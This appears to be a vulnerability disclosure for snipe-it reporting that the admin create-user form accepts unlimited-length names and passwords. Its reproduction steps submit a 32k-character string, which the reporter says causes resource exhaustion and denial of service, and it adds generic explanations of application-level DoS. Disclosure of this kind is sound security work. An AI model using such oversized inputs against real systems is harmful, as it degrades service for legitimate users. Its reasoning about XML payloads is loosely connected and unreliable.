Able to create an user with a long password as well as long username in snipe/snipe-it
May 12th 2022
Any admin may able to create and allocate user the credentials but when admin creates a user account where as the fields with the first name , last name and password has no defined length limit where as this scenario causes the application level DOS to the snipe-it
What's the meaning of application level DOS ?
An application DDoS attack may target the processes that generate web pages in response to simple HTTP requests. One HTTP request may be small, but the required work to respond by the server may be many times larger. As a result, threat actors may flood the server with many HTTP requests, making it impossible for the server to respond to legitimate requests in any practical timeframe. Examples typically include website forms (login, uploading of photo/video, submitting feedback, etc.).
Steps to Reproduce:
- After logged in via the admin page , Go to create user functionality
- Now we can generate a random string with length of 32k character with the following tool
- Now click on create user, the user will be created with max length of 32k character without length restriction and entity wasn't been checked. So this kind of attack will lead to resource consumption as well as application level DOS
A Large Payload Post is an application attack where the threat actor manipulates the XML encoding used by targeted web servers. The threat actor sends the webserver a data structure encoded in XML. The server then attempts to decode but is forced to use rapidly increasing amounts of memory, thus overwhelming the system and crashing the service.